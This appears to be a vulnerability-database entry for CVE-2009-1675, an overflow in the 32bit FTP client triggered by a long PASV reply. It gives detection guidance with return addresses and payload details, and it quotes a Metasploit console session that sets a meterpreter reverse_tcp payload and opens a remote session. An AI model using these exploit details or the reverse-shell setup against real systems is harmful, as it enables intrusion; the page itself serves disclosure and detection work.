CVE-2009-1675
published 2009-05-18CVE-2009-1675: Stack-based buffer overflow in ElectraSoft 32bit FTP 09.04.24 allows remote FTP servers to execute arbitrary code via a long 227 reply to a PASV command.
PriorityP354critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
13.79%
96.0th percentile
Stack-based buffer overflow in ElectraSoft 32bit FTP 09.04.24 allows remote FTP servers to execute arbitrary code via a long 227 reply to a PASV command.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| electrasoft | 32bit_ftp | — | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Detect malicious FTP server sending an oversized 227 PASV reply (~966+ bytes of numeric padding followed by a return address) to exploit 32bit FTP client 09.04.24. ↗
- →Flag FTP 227 PASV responses exceeding normal length (normal is ~30 bytes); payloads here use ~966 bytes of numeric text before the return address. ↗
- →Payload bad characters for this exploit are null byte, newline, carriage return, and space (\x00\x0a\x0d\x20); encoder used is AlphanumMixed — look for alphanumeric shellcode in FTP 227 responses. ↗
- →The exploit also abuses overly long filenames served by a rogue FTP LIST reply (separate but related attack vector in the same client). ↗
- →Return address 0x7c868667 (jmp esp, kernel32.dll) on Windows XP SP3 English is a reliable indicator of this specific exploit targeting that platform. ↗
- ·The exploit targets only 32bit FTP client version 09.04.24; other versions are not confirmed vulnerable. ↗
- ·Return addresses are platform-specific: 0x7c868667 for XP SP3 English and 0x7C82385D for XP SP2 French; detections relying on these hardcoded values will not generalise to other OS versions. ↗
- ·The Metasploit module sets a StackAdjustment of -3500, meaning the payload stack pivot is large; this is relevant when tuning stack-pivot detection thresholds. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
32bit FTP - 'PASV' Reply Client Remote Overflow (Metasploit)
exploitdb·2009-05-07
CVE-2009-1675 32bit FTP - 'PASV' Reply Client Remote Overflow (Metasploit)
32bit FTP - 'PASV' Reply Client Remote Overflow (Metasploit)
---
#msf > use exploit/windows/ftp/32bitftp_pasv_reply
#msf exploit(32bitftp_pasv) > set PAYLOAD windows/meterpreter/reverse_tcp
#PAYLOAD => windows/meterpreter/reverse_tcp
#msf exploit(32bitftp_pasv) > set LHOST 192.168.1.2
#LHOST => 192.168.1.2
#msf exploit(32bitftp_pasv) > exploit
#[*] Exploit running as background job.
#msf exploit(32bitftp_pasv) >
#[*] Handler binding to LHOST 0.0.0.0
#[*] Started reverse handler
#[*] Server started.
# Victim connecting to the malicious ftp server.
#[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
#[*] Sending stage (2650 bytes)
#[*] Sleeping before handling stage...
#[*] Uploading DLL (75787 bytes)...
#[*] Upload completed.
#[*] Meterpreter session 1 opened (192.168
Metasploit
32bit FTP Client Stack Buffer Overflow
metasploit
32bit FTP Client Stack Buffer Overflow
32bit FTP Client Stack Buffer Overflow
This module exploits a stack buffer overflow in 32bit ftp client, triggered when trying to download a file that has an overly long filename.
No writeups or analysis indexed.
http://www.securityfocus.com/bid/34838https://exchange.xforce.ibmcloud.com/vulnerabilities/50337https://exchange.xforce.ibmcloud.com/vulnerabilities/50644https://www.exploit-db.com/exploits/8623http://www.securityfocus.com/bid/34838https://exchange.xforce.ibmcloud.com/vulnerabilities/50337https://exchange.xforce.ibmcloud.com/vulnerabilities/50644https://www.exploit-db.com/exploits/8623
2009-05-18
Published